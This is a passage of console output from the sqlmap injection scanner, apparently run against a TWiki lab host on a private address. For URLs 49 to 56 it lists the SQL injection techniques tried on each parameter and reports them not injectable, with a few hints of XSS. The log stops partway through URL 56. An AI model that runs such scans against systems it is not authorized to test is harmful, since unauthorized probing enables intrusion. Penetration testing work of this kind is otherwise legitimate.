[18:45:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:45:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:45:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:45:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:45:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:45:11] [INFO] testing 'MySQL inline queries'
[18:45:12] [INFO] testing 'PostgreSQL inline queries'
[18:45:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:45:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:45:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:45:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:45:13] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:45:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:45:14] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:45:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:45:15] [INFO] testing 'Oracle AND time-based blind'
[18:45:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:45:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:45:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:45:26] [WARNING] URI parameter '#1*' is not injectable
[18:45:26] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 49:
GET http://192.168.1.113/twiki/bin/search/Know/SearchResult?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on
do you want to test this URL? [Y/n/q]
> Y
[18:45:26] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Know/SearchResult?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:45:26] [INFO] testing connection to the target URL
[18:45:27] [INFO] testing if the target URL is stable
[18:45:27] [INFO] target URL is stable
[18:45:27] [INFO] testing if URI parameter '#1*' is dynamic
[18:45:27] [INFO] confirming that URI parameter '#1*' is dynamic
[18:45:28] [INFO] URI parameter '#1*' is dynamic
[18:45:28] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:45:28] [INFO] testing for SQL injection on URI parameter '#1*'
[18:45:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:45:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:45:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:45:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:45:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:45:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:45:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:45:31] [INFO] testing 'MySQL inline queries'
[18:45:31] [INFO] testing 'PostgreSQL inline queries'
[18:45:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:45:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:45:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:45:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:45:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:45:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:45:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:45:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:45:34] [INFO] testing 'Oracle AND time-based blind'
[18:45:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:45:35] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:45:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:45:46] [WARNING] URI parameter '#1*' is not injectable
[18:45:46] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 50:
GET http://192.168.1.113:80/twiki/bin/edit/Know/WebChanges?t=1441456711
do you want to test this URL? [Y/n/q]
> Y
[18:45:46] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Know/WebChanges?t=1441456711'
[18:45:46] [INFO] testing connection to the target URL
[18:45:46] [INFO] testing if the target URL is stable
[18:45:47] [INFO] target URL is stable
[18:45:47] [INFO] testing if GET parameter 't' is dynamic
[18:45:47] [WARNING] GET parameter 't' does not appear dynamic
[18:45:47] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[18:45:47] [INFO] testing for SQL injection on GET parameter 't'
[18:45:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:45:48] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:45:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:45:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:45:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:45:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:45:50] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:45:50] [INFO] testing 'MySQL inline queries'
[18:45:50] [INFO] testing 'PostgreSQL inline queries'
[18:45:50] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:45:50] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:45:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:45:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:45:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:45:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:45:52] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:45:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:45:53] [INFO] testing 'Oracle AND time-based blind'
[18:45:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:45:54] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:45:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:46:05] [WARNING] GET parameter 't' is not injectable
[18:46:05] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 51:
GET http://192.168.1.113:80/twiki/bin/search/Know/SearchResult?scope=text&regex=on&search=Web *Changes[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[18:46:05] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Know/SearchResult?scope=text&regex=on&search=Web *Changes[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:46:05] [INFO] testing connection to the target URL
[18:46:05] [INFO] testing if the target URL is stable
[18:46:06] [INFO] target URL is stable
[18:46:06] [INFO] testing if URI parameter '#1*' is dynamic
[18:46:06] [WARNING] URI parameter '#1*' does not appear dynamic
[18:46:06] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:46:06] [INFO] testing for SQL injection on URI parameter '#1*'
[18:46:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:46:07] [WARNING] reflective value(s) found and filtering out
[18:46:08] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:46:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:46:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:46:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:46:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:46:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:46:08] [INFO] testing 'MySQL inline queries'
[18:46:08] [INFO] testing 'PostgreSQL inline queries'
[18:46:08] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:46:08] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:46:08] [WARNING] time-based comparison requires larger statistical model, please wait......
[18:46:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:46:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:46:09] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:46:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:46:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:46:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:46:09] [INFO] testing 'Oracle AND time-based blind'
[18:46:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:46:09] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:46:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:46:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:46:13] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[18:46:13] [WARNING] false positive or unexploitable injection point detected
[18:46:13] [WARNING] URI parameter '#1*' is not injectable
[18:46:13] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 52:
GET http://192.168.1.113:80/twiki/bin/view/Know/WebChanges?skin=print
do you want to test this URL? [Y/n/q]
> Y
[18:46:13] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Know/WebChanges?skin=print'
[18:46:13] [INFO] testing connection to the target URL
[18:46:14] [INFO] testing if the target URL is stable
[18:46:14] [INFO] target URL is stable
[18:46:14] [INFO] testing if GET parameter 'skin' is dynamic
[18:46:15] [INFO] confirming that GET parameter 'skin' is dynamic
[18:46:15] [INFO] GET parameter 'skin' is dynamic
[18:46:15] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[18:46:15] [INFO] testing for SQL injection on GET parameter 'skin'
[18:46:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:46:15] [INFO] heuristics detected web page charset 'ascii'
[18:46:15] [WARNING] reflective value(s) found and filtering out
[18:46:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:46:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:46:18] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:46:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:46:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:46:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:46:20] [INFO] testing 'MySQL inline queries'
[18:46:20] [INFO] testing 'PostgreSQL inline queries'
[18:46:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:46:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:46:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:46:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:46:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:46:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:46:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:46:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:46:25] [INFO] testing 'Oracle AND time-based blind'
[18:46:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:46:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:46:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:46:43] [WARNING] GET parameter 'skin' is not injectable
[18:46:43] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 53:
GET http://192.168.1.113:80/twiki/bin/rdiff/Know/WebChanges?rev1=1.3&rev2=1.2
do you want to test this URL? [Y/n/q]
> Y
[18:46:43] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebChanges?rev1=1.3&rev2=1.2'
[18:46:43] [INFO] testing connection to the target URL
[18:46:43] [INFO] testing if the target URL is stable
[18:46:44] [INFO] target URL is stable
[18:46:44] [INFO] testing if GET parameter 'rev1' is dynamic
[18:46:44] [WARNING] GET parameter 'rev1' does not appear dynamic
[18:46:45] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[18:46:45] [INFO] testing for SQL injection on GET parameter 'rev1'
[18:46:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:46:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:46:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:46:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:46:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:46:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:46:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:46:51] [INFO] testing 'MySQL inline queries'
[18:46:51] [INFO] testing 'PostgreSQL inline queries'
[18:46:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:46:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:46:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:46:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:46:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:46:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:46:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:46:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:46:57] [INFO] testing 'Oracle AND time-based blind'
[18:46:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:46:58] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:47:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:47:19] [WARNING] GET parameter 'rev1' is not injectable
[18:47:19] [INFO] testing if GET parameter 'rev2' is dynamic
[18:47:19] [WARNING] GET parameter 'rev2' does not appear dynamic
[18:47:19] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[18:47:19] [INFO] testing for SQL injection on GET parameter 'rev2'
[18:47:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:47:21] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:47:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:47:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:47:24] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:47:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:47:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:47:26] [INFO] testing 'MySQL inline queries'
[18:47:26] [INFO] testing 'PostgreSQL inline queries'
[18:47:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:47:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:47:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:47:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:47:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:47:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:47:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:47:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:47:33] [INFO] testing 'Oracle AND time-based blind'
[18:47:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:47:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:47:55] [WARNING] GET parameter 'rev2' is not injectable
[18:47:55] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 54:
GET http://192.168.1.113:80/twiki/bin/view/Know/WebChanges?rev=1.2
do you want to test this URL? [Y/n/q]
> Y
[18:47:55] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Know/WebChanges?rev=1.2'
[18:47:55] [INFO] testing connection to the target URL
[18:47:56] [INFO] testing if the target URL is stable
[18:47:56] [INFO] target URL is stable
[18:47:56] [INFO] testing if GET parameter 'rev' is dynamic
[18:47:57] [WARNING] GET parameter 'rev' does not appear dynamic
[18:47:57] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[18:47:57] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[18:47:57] [INFO] testing for SQL injection on GET parameter 'rev'
[18:47:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:47:57] [WARNING] reflective value(s) found and filtering out
[18:47:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:47:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:47:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:48:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:48:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:48:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:48:01] [INFO] testing 'MySQL inline queries'
[18:48:01] [INFO] testing 'PostgreSQL inline queries'
[18:48:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:48:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:48:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:48:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:48:03] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:48:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:48:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:48:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:48:05] [INFO] testing 'Oracle AND time-based blind'
[18:48:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:48:05] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:48:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:48:20] [WARNING] GET parameter 'rev' is not injectable
[18:48:20] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:48:20] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebChanges?rev1=1.2&rev2=1.1'
[18:48:20] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebChanges?rev=1.1'
URL 55:
GET http://192.168.1.113:80/twiki/bin/oops/Know/WebChanges?template=oopsmore&param1=1.3&param2=1.3
do you want to test this URL? [Y/n/q]
> Y
[18:48:20] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Know/WebChanges?template=oopsmore&param1=1.3&param2=1.3'
[18:48:20] [INFO] testing connection to the target URL
[18:48:20] [INFO] testing if the target URL is stable
[18:48:21] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[18:48:21] [INFO] testing if GET parameter 'template' is dynamic
[18:48:21] [INFO] confirming that GET parameter 'template' is dynamic
[18:48:21] [INFO] GET parameter 'template' is dynamic
[18:48:21] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[18:48:21] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[18:48:21] [INFO] testing for SQL injection on GET parameter 'template'
[18:48:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:48:22] [INFO] heuristics detected web page charset 'ascii'
[18:48:22] [WARNING] reflective value(s) found and filtering out
[18:48:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:48:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:48:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:48:23] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:48:24] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:48:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:48:24] [INFO] testing 'MySQL inline queries'
[18:48:24] [INFO] testing 'PostgreSQL inline queries'
[18:48:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:48:24] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:48:25] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:48:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:48:25] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:48:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:48:26] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:48:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:48:27] [INFO] testing 'Oracle AND time-based blind'
[18:48:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:48:27] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:48:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:48:36] [WARNING] GET parameter 'template' is not injectable
[18:48:36] [INFO] testing if GET parameter 'param1' is dynamic
[18:48:36] [WARNING] GET parameter 'param1' does not appear dynamic
[18:48:36] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[18:48:37] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[18:48:37] [INFO] testing for SQL injection on GET parameter 'param1'
[18:48:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:48:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:48:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:48:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:48:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:48:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:48:40] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:48:40] [INFO] testing 'MySQL inline queries'
[18:48:40] [INFO] testing 'PostgreSQL inline queries'
[18:48:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:48:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:48:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:48:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:48:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:48:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:48:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:48:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:48:43] [INFO] testing 'Oracle AND time-based blind'
[18:48:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:48:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:48:56] [WARNING] GET parameter 'param1' is not injectable
[18:48:56] [INFO] testing if GET parameter 'param2' is dynamic
[18:48:56] [WARNING] GET parameter 'param2' does not appear dynamic
[18:48:56] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[18:48:56] [INFO] testing for SQL injection on GET parameter 'param2'
[18:48:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:48:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:48:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:48:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:48:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:48:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:48:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:48:59] [INFO] testing 'MySQL inline queries'
[18:48:59] [INFO] testing 'PostgreSQL inline queries'
[18:49:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:49:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:49:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:49:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:49:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:49:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:49:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:49:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:49:03] [INFO] testing 'Oracle AND time-based blind'
[18:49:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:49:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:49:16] [WARNING] GET parameter 'param2' is not injectable
[18:49:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 56:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/MeaningfulTitle?topicparent=TWiki.TextFormattingFAQ
do you want to test this URL? [Y/n/q]
> Y
[18:49:16] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/MeaningfulTitle?topicparent=TWiki.TextFormattingFAQ'
[18:49:16] [INFO] testing connection to the target URL
[18:49:16] [INFO] testing if the target URL is stable
[18:49:17] [INFO] target URL is stable
[18:49:17] [INFO] testing if GET parameter 'topicparent' is dynamic
[18:49:17] [WARNING] GET parameter 'topicparent' does not appear dynamic
